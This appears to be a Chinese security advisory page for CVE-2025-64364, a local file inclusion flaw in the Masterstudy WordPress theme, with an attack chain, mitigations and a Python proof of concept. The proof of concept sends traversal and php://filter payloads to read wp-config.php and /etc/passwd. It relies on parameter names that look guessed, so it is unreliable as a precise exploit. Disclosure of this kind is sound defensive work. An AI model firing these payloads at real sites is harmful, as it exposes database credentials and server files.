CVE-2025-64364 CVSS 7.5 高危

CVE-2025-64364 Masterstudy主题本地文件包含漏洞

披露日期: 2025-10-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-64364

漏洞类型

本地文件包含(LFI)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

StylemixThemes Masterstudy WordPress主题

漏洞概述

CVE-2025-64364是StylemixThemes开发的Masterstudy WordPress主题中的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞属于PHP本地文件包含(Local File Inclusion, LFI)类型，源于应用程序对文件包含操作中的文件名控制不当。攻击者可以利用此漏洞在目标服务器上包含本地文件，从而读取敏感信息或执行任意代码。漏洞影响Masterstudy主题从任意版本到4.8.126之前的全部版本。该漏洞由Patchstack团队的安全研究人员发现并报告，攻击向量为网络形式，需要低权限认证，但无需用户交互即可发起攻击。由于攻击复杂度较高，实际利用需要一定的技术门槛。

技术细节

该漏洞存在于Masterstudy主题的PHP代码中，由于对include/require语句的文件名参数缺乏充分的输入验证，攻击者可以通过构造恶意的文件路径参数来包含服务器上的任意本地文件。在WordPress主题环境中，攻击者通常可以利用此漏洞读取wp-config.php等敏感配置文件，获取数据库凭证和加密密钥等敏感信息。进一步利用可能包括读取/etc/passwd等系统文件或通过PHP协议包装器(如php://filter)读取源代码。攻击者还可能结合其他漏洞或配置不当的情况实现远程代码执行。由于CVSS向量显示需要低权限认证，攻击者可能需要先获取WordPress站点的注册用户账号。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的WordPress和Masterstudy主题版本

STEP 2

步骤2

攻击者确认目标版本低于4.8.126，存在文件包含漏洞

STEP 3

步骤3

如果需要认证，攻击者创建低权限用户账号或利用已有账号登录

STEP 4

步骤4

攻击者构造恶意请求，通过漏洞参数注入路径遍历载荷读取wp-config.php

STEP 5

步骤5

成功获取数据库凭证、API密钥等敏感配置信息

STEP 6

步骤6

利用获取的凭证进行进一步攻击，如数据库注入或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-64364 Local File Inclusion PoC
# Affected: Masterstudy Theme < 4.8.126
# Type: Local File Inclusion (LFI)

import requests
from urllib.parse import quote

target = "http://target-site.com/"

# Common vulnerable parameters in Masterstudy theme
vulnerable_params = [
    "stm_lms_template",
    "page_template",
    "view_type",
    "course_id"
]

# Files to read (sensitive)
files_to_read = [
    "../../../../wp-config.php",
    "../../../../../etc/passwd",
    "php://filter/convert.base64-encode/resource=wp-config.php"
]

def test_lfi(url, param, payload):
    """Test for LFI vulnerability"""
    try:
        params = {param: payload}
        response = requests.get(url, params=params, timeout=10)
        return response.text
    except Exception as e:
        return f"Error: {e}"

# Example exploitation
payload = "../../../../wp-config.php" + "\x00"
test_url = target + "wp-content/themes/masterstudy/"

print(f"[*] Testing LFI on {test_url}")
print(f"[*] Payload: {payload}")
result = test_lfi(test_url, vulnerable_params[0], payload)
print(f"[+] Response length: {len(result)}")

影响范围

Masterstudy主题 < 4.8.126

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1)限制非管理员用户的功能权限；2)在Web应用防火墙(WAF)中添加针对路径遍历载荷的规则；3)禁用WordPress主题的动态文件包含功能；4)定期监控访问日志，查找异常的文件包含请求模式；5)考虑暂时切换到其他经过安全审计的WordPress主题。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表